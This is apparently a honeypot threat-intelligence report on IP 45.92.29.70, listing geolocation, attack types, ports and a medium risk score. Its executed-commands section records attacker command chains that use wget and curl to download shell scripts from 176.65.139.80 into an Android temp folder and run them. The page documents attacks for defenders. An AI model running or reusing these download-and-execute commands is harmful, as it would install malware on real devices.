TROYANOSYVIRUS
Active Threat β€’ MEDIUM

45.92.29.70

First Detection3/19/2026
Last Activity3/29/2026
ISPUnReal Servers, LLC
🎯
64
Total Attacks
πŸ”Œ
4
Ports
πŸ“‘
2
Attack Types
🦠
0
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
Kansas City
ASN
AS64236
ISP
UnReal Servers, LLC

Attack Types

adb_honeypot
tcp_trap

Attacked Ports

55005555809060001

Associated Malware

No associated malware

Executed Commands

$cd /data/local/tmp/; busybox wget http://176.65.139.80/dd.sh; sh dd.sh; curl http://176.65.139.80/dd.sh; sh dd.sh; wget http://176.65.139.80/dd.sh; sh dd.sh; curl http://176.65.139.80/dd.sh; sh dd.sh; busybox wget http://176.65.139.80/dd.sh; sh dd.sh; busybox curl http://176.65.139.80/dd.sh; sh dd.sh5x
$cd /data/local/tmp/; busybox wget http://176.65.139.80/76d32be0.sh; sh 76d32be0.sh; curl http://176.65.139.80/76d32be0.sh; sh 76d32be0.sh; wget http://176.65.139.80/76d32be0.sh; sh 76d32be0.sh; curl http://176.65.139.80/76d32be0.sh; sh 76d32be0.sh; busybox wget http://176.65.139.80/76d32be0.sh; sh 76d32be0.sh; busybox curl http://176.65.139.80/76d32be0.sh; sh 76d32be0.sh4x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Risk Assessment

50
/100
LowMediumHighCritical